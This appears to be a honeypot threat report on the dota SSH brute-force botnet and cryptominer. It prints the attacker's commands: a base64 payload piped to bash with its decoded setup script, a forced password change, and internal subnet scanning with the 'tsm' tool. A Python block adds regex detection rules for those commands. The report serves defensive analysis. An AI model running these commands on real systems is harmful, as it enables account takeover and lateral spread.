Summary

The dota sample belongs to a malware family that has been active for many years. It typically uses credential dictionary attacks against SSH servers; after a successful login it collects system information, establishes persistent access, hijacks server resources, and performs a series of related actions. The elkeid honeypot collected its dota.tar.gz sample on 20221104.

Sample type

Botnet, cryptomining

elkeid sample ID

elkeid_20221109_botnet_7

Capture time

20221109

Last active

20221114

Keywords

dota.tar.gz,X17-unix

Known intrusion vectors

  • Weak-password brute force

Samples involved

  • dota.tar.gz

Main behaviors

  • Collect system information

    • bash -c cat /proc/cpuinfo | grep model | grep name | wc -l
    • bash -c free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}
    • bash -c lscpu | grep Model
  • Execution

    • bash -c sleep 15s && cd /var/tmp; echo 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 | base64 --decode | bash
    • Note: the decoded content follows:
    • #!/bin/bash
    • cd /tmp
    • rm -rf .ssh
    • rm -rf .mountfs
    • rm -rf .X13-unix
    • rm -rf .X17-unix
    • mkdir .X17-unix
    • cd .X17-unix
    • mv /var/tmp/dota.tar.gz dota.tar.gz
    • tar xf dota.tar.gz
    • sleep 3s && cd /tmp/.X17-unix/.rsync/c
    • nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
    • sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
    • sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1&
    • exit 0
  • Change the password and save it to up.txt

    • bash -c echo dropbox\n0wE4NvqjqoFq\n0wE4NvqjqoFq\n|passwd > /tmp/up.txt
    • /bin/bash -c echo dropbox:dropbox | chpasswd
  • Initialize XMRig and scan subnets

    • nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
    • sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
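As an added example (not part of this report or of the sample), the following Python applies command-line detection rules derived from the behaviors listed above to constructed process events. The rule names, regexes and sample events are assumptions written for this illustration.

```python
import re

# Detection rules modelled on the dota.tar.gz behaviors above:
# (rule name, regex applied to a process command line). Assumed, not from the report.
RULES = [
    ("base64_decode_to_shell", re.compile(r"base64\s+(--decode|-d)\s*\|\s*(ba)?sh\b")),
    ("hidden_dir_in_tmp", re.compile(r"/(?:var/)?tmp/\.(?:X\d+-unix|rsync|mountfs)\b")),
    ("dota_archive", re.compile(r"\bdota\d*\.tar\.gz\b")),
    ("chpasswd_dropbox", re.compile(r"echo\s+dropbox:\S+\s*\|\s*chpasswd")),
    ("tsm_ssh_scanner", re.compile(
        r"/tsm\s.*\s-p\s+22\s.*/tmp/up\.txt\s+\d{1,3}(?:\.\d{1,3}){1,3}\b")),
    ("cpu_recon", re.compile(r"(cat\s+/proc/cpuinfo|lscpu)")),
]


def match_rules(cmdline):
    """Return the names of all rules that fire on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(events):
    """events: iterable of (pid, cmdline). Returns {pid: [rule, ...]} for hits only."""
    hits = {}
    for pid, cmd in events:
        matched = match_rules(cmd)
        if matched:
            hits[pid] = matched
    return hits


# Constructed process events shaped like the commands in the report (not a real capture).
SAMPLE_EVENTS = [
    (1001, "bash -c cat /proc/cpuinfo | grep model | grep name | wc -l"),
    (1002, "bash -c sleep 15s && cd /var/tmp; echo QUJD | base64 --decode | bash"),
    (1003, "/bin/bash -c echo dropbox:dropbox | chpasswd"),
    (1004, "nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 "
           "/tmp/up.txt 192.168 >> /dev/null 2>1&"),
    (1005, "sshd: user@pts/0"),  # benign: should produce no hit
    (1006, "tar xf dota.tar.gz"),
]

if __name__ == "__main__":
    for pid, rules in scan_events(SAMPLE_EVENTS).items():
        print(pid, rules)
```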

IOC

  • 186.147.249.39

Reference links

  • dota3.tar.gz

https://www.countercraftsec.com/blog/dota3-malware-again-and-again/

  • dota.tar.gz

https://blog.edie.io/2020/10/31/honeypot-diaries-dota-malware/